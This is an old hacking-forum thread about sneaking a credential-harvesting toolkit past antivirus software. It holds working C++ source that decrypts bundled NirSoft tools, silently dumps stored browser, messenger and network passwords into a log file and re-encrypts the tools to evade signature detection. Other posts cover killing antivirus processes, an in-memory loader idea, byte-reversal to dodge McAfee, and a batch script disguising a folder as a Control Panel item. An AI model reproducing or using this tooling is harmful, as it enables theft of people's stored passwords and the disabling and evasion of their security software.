mleo2003 Posted December 20, 2007 Share Posted December 20, 2007 Some AV products have random names for their scanning, so looking for process names may not help in some situations. Quote Link to comment Share on other sites More sharing options...
sc0rpi0 Posted December 20, 2007 Author Share Posted December 20, 2007 Some AV products have random names for their scanning, so looking for process names may not help in some situations. This method has been tested with mcafee and it works. Exactly which anti virus products are you referring to? Quote Link to comment Share on other sites More sharing options...
mleo2003 Posted December 20, 2007 Share Posted December 20, 2007 TrendMicro Enterprise Solution (old job used it) Quote Link to comment Share on other sites More sharing options...
hexlax Posted December 21, 2007 Share Posted December 21, 2007 Some AV products have random names for their scanning, so looking for process names may not help in some situations. True; however, it may be as simple as searching for default installation directories such as "C:Program Files" or even the registry. Side bar: Has anyone tried to end AV processes by using the taskkill /t (which kills child processes as well)? Currently not running any AV on my VM for packing reasons for this app... Quote Link to comment Share on other sites More sharing options...
sc0rpi0 Posted December 21, 2007 Author Share Posted December 21, 2007 Some AV products have random names for their scanning, so looking for process names may not help in some situations. True; however, it may be as simple as searching for default installation directories such as "C:Program Files" or even the registry. Side bar: Has anyone tried to end AV processes by using the taskkill /t (which kills child processes as well)? Currently not running any AV on my VM for packing reasons for this app... Yes, that is a good idea. Unfortunately, I wouldn't be the one to ask. Although "taskill /t" may work, I would recommend using pskill from sysinternals. I wonder...would this killing of child processes do the trick? [thinking outloud] Not only can it kill child processes, but system processes as well. Quote Link to comment Share on other sites More sharing options...
hexlax Posted December 21, 2007 Share Posted December 21, 2007 Here is the source using a small payload from the great folks at Nirsoft. Still a lot of work to do to finish the final program, but I'll have more time over the holidays with no work or classes to hack up some code. I may start a new thread for my own payload since this is becoming a beast of its own. This code assumes you have ccrypt in the current executing directory. Although the encrypted files should scan clean for signature based AVs(please provide feedback), once they are ran, AVs will catch the process. Also, you should manually encrypt the payload files first before running this code. /* * AUTHOR: hexlax * * The encryption handling of this program is done. Please * give me feedback if any AVs catch it. * * Command line options for final product(not implemented now): * a) -q quiet mode, nothing displays to screen * b) -f force run anyways *  i) if local admin privs not present * ii) if AV is detected and forced stop failed * iii) Places payload in danger of AV removal * c) -c config file path [optional - default presumed] *  i) payload list * ii) utilities list (ccrypt, pskill, etc.) * d) -k only attempt to kill AV, no payload run * * The final product should be scalable enough for a user * to add/delete/modify the payload by editing the config file. * */ #include "stdafx.h" #include <iostream> #include <string> #include <stdlib.h> using namespace std; //global constants const string PAYLOAD_FILEPATH = "tools"; //TODO: insert user pref from config file. const string ENC_KEY = "hexlax@hak5"; //TODO: insert user pref from config file. void decrypt() { cout << "Decrypting payload...n"; string syscall = "ccrypt -d -K " + ENC_KEY + " -r " + PAYLOAD_FILEPATH; system(syscall.c_str()); return; } void encrypt(){ cout << "Encrypting payload back...n"; string syscall = "ccrypt -e -K " + ENC_KEY + " -q -r " + PAYLOAD_FILEPATH; system(syscall.c_str()); return; } void run_payload(){ string syscall; cout << "Running Payload:"; //IEPV.EXE cout << ".PSPV.."; syscall = PAYLOAD_FILEPATH + "iepv /stext iepv.tmp"; system(syscall.c_str()); //MSPASS.EXE cout << ".MSPASS..."; syscall = PAYLOAD_FILEPATH + "mspass /stext mspass.tmp"; system(syscall.c_str()); //NETPASS.EXE cout << ".NETPASS.."; syscall = PAYLOAD_FILEPATH + "netpass /stext netpass.tmp"; system(syscall.c_str()); //PSPV.EXE cout << ".PSPV.."; syscall = PAYLOAD_FILEPATH + "pspv /stext pspv.tmp"; system(syscall.c_str()); //END PAYLOAD cout << "n"; return; } void cleanup_temps(){ string syscall = ""; cout << "Cleaning up...n"; //consolidate our tmp files in to one //TODO: implement the user's preference here for a //file name & program list from config file //TODO: after list file is done, use a for statement for cleaner code cout << "Saving output to log.txt...n"; syscall = "type iepv.tmp >> log.txt"; system(syscall.c_str()); syscall = "type mspass.tmp >> log.txt"; system(syscall.c_str()); syscall = "type netpass.tmp >> log.txt"; system(syscall.c_str()); syscall = "type pspv.tmp >> log.txt"; system(syscall.c_str()); //get rid of *.tmp files cout << "Removing temp files...n"; syscall = "del *.tmp"; system(syscall.c_str()); } int main(){ decrypt(); run_payload(); encrypt(); cleanup_temps(); cout << "Scan Complete!n"; return 0; } Quote Link to comment Share on other sites More sharing options...
trustme Posted December 22, 2007 Share Posted December 22, 2007 Package not payload. People really need to learn the difference. Quote Link to comment Share on other sites More sharing options...
hexlax Posted December 24, 2007 Share Posted December 24, 2007 Hey, I started a new thread for my package implementing the encryption. Right now I'm working on the AVkill side of the program. Please help me out their Scorpio with that AV list you're compiling... http://forums.hak5.org/index.php/topic,8169.0.html Quote Link to comment Share on other sites More sharing options...
Zero_Himself Posted December 2, 2008 Share Posted December 2, 2008 Well, lets think outside of the box for a minute ;-) before hand.... *payload* = "Our program that we are trying to sneak past the AV" If I were trying to do this back in the day(MSdos 5-6.22), I would encrypt the file in a .exe loader(that I would write myself), and then decrypt the *payload* in memory, and reload the decrypted *payload* overtop of some null-padded chunk of my loaders memory (maybe just overtop of the original .exe's memory), and restart it..... So, maybe A loader could be written that: A. uses the same Libs and Dll's(so they are already loaded) B. decrypts it's payload, and overwrites itself(WITHOUT GETTING SWAPPED OR WRITTEN TO DISK!!!!) C. restarts it's own execution...... Maybe this would get past the anti-virus. I don't have the time, or I would look into the idea, but I suspect that if you search MSDN, we can probably find the format of a .EXE file, and how the libs(.dll's) are loaded...., and once you do that, you can load the needed libs, and by-pass the whole writing to disk(I AM ASSUMING THAT THAT IS WHERE AN AV PICKS IT UP AT.....), and by-pass dectection. I use Mcafee, and I am trying to whip up a little POC program to see if McAfee will catch the decrypted *payload* in memory or not... I'll keep ya filled in Quote Link to comment Share on other sites More sharing options...
Zero_Himself Posted December 2, 2008 Share Posted December 2, 2008 Well, lets think outside of the box for a minute ;-) before hand.... *payload* = "Our program that we are trying to sneak past the AV" If I were trying to do this back in the day(MSdos 5-6.22), I would encrypt the file in a .exe loader(that I would write myself), and then decrypt the *payload* in memory, and reload the decrypted *payload* overtop of some null-padded chunk of my loaders memory (maybe just overtop of the original .exe's memory), and restart it..... So, maybe A loader could be written that: A. uses the same Libs and Dll's(so they are already loaded) B. decrypts it's payload, and overwrites itself(WITHOUT GETTING SWAPPED OR WRITTEN TO DISK!!!!) C. restarts it's own execution...... Maybe this would get past the anti-virus. I don't have the time, or I would look into the idea, but I suspect that if you search MSDN, we can probably find the format of a .EXE file, and how the libs(.dll's) are loaded...., and once you do that, you can load the needed libs, and by-pass the whole writing to disk(I AM ASSUMING THAT THAT IS WHERE AN AV PICKS IT UP AT.....), and by-pass dectection. I use Mcafee, and I am trying to whip up a little POC program to see if McAfee will catch the decrypted *payload* in memory or not... I'll keep ya filled in Funny thing here..... By simply reversing the entire file (first byte becomes last byte, second byte becomes next to last byte, etc), My file goes totally undetected.... (DIDN'T EVEN HAVE TO CRYPT IT!!!!, just flip the script ;-) ) yep, just like I thought.... McAfee only catches it upon a disk write(I still haven't tried to execute anything from memory, but I suspect that we would kind of need to by-pass windows for that kind of functionality), So in theory we could custom load our decrypted *payload*, and run it without the AV noticing it...(this would maybe even eliminate the need for an AVkill..) but then again, this would be a real temporary thing... I'm willing to bet tools like this are written everyday, and added to AV signature files everyday... but remember this, If you write a nifty tool that successfully does this, everyone will want to use it, then it becomes mainstream, and then AV's will notice it, and it will get blocked by AV software ;-) Quote Link to comment Share on other sites More sharing options...
Infinity0 Posted December 5, 2008 Share Posted December 5, 2008 Oh I know a way. There is a way to rename a folder using the entire path, it then appears to be a Control Panel. Of course this only works on XP. I feel I should admit. I didn't make this, I found it. @echo off if exist con.{21EC2020-3AEA-1069-A2DD-08002B30309D}\nul goto toggleoff if exist Hide\nul goto toggleon goto end :toggleoff move "\\.\%cd%\con.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Hide>nul goto end :toggleon move Hide "\\.\%cd%\con.{21EC2020-3AEA-1069-A2DD-08002B30309D}">nul :end Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.